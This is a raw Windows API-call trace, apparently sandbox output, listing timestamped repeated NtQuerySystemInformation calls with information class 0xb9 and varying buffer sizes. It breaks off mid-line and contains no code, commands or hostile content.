[0229.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x28, ResultLength=0x0) [0229.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x28, ResultLength=0x0) [0229.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x38, ResultLength=0x0) [0229.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x28, ResultLength=0x0) [0229.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x28, ResultLength=0x0) [0229.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce00, Length=0x20, ResultLength=0x0) [0229.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcd80, Length=0x20, ResultLength=0x0) [0229.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcd80, Length=0x20, ResultLength=0x0) [0229.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcd80, Length=0x20, ResultLength=0x0) [0229.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x38, ResultLength=0x0) [0229.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x38, ResultLength=0x0) [0229.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcec0, Length=0x20, ResultLength=0x0) [0229.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce50, Length=0x20, ResultLength=0x0) [0229.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce50, Length=0x20, ResultLength=0x0) [0229.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd7e0, Length=0x28, ResultLength=0x0) [0229.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x28, ResultLength=0x0) [0229.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x28, ResultLength=0x0) [0229.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x28, ResultLength=0x0) [0229.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x28, ResultLength=0x0) [0229.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x28, ResultLength=0x0) [0229.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x28, ResultLength=0x0) [0229.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x28, ResultLength=0x0) [0229.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd690, Length=0x20, ResultLength=0x0) [0229.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd690, Length=0x20, ResultLength=0x0) [0229.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x28, ResultLength=0x0) [0229.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0229.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0229.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd550, Length=0x20, ResultLength=0x0) [0229.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd550, Length=0x20, ResultLength=0x0) [0229.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0229.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0229.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0229.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd600, Length=0x20, ResultLength=0x0) [0229.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd600, Length=0x20, ResultLength=0x0) [0229.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd600, Length=0x20, ResultLength=0x0) [0229.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0229.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd630, Length=0x20, ResultLength=0x0) [0229.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5d0, Length=0x20, ResultLength=0x0) [0229.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5d0, Length=0x20, ResultLength=0x0) [0229.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0229.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0229.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0229.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0229.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4c0, Length=0x48, ResultLength=0x0) [0229.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x28, ResultLength=0x0) [0229.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x28, ResultLength=0x0) [0229.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4c0, Length=0x48, ResultLength=0x0) [0229.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x28, ResultLength=0x0) [0229.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x28, ResultLength=0x0) [0229.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0229.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0229.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x50, ResultLength=0x0) [0229.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x50, ResultLength=0x0) [0229.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x50, ResultLength=0x0) [0229.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x50, ResultLength=0x0) [0229.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x50, ResultLength=0x0) [0229.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x50, ResultLength=0x0) [0229.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x50, ResultLength=0x0) [0229.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x38, ResultLength=0x0) [0229.682] NtQuerySystemInformation (SystemInformationClass=0xb9, 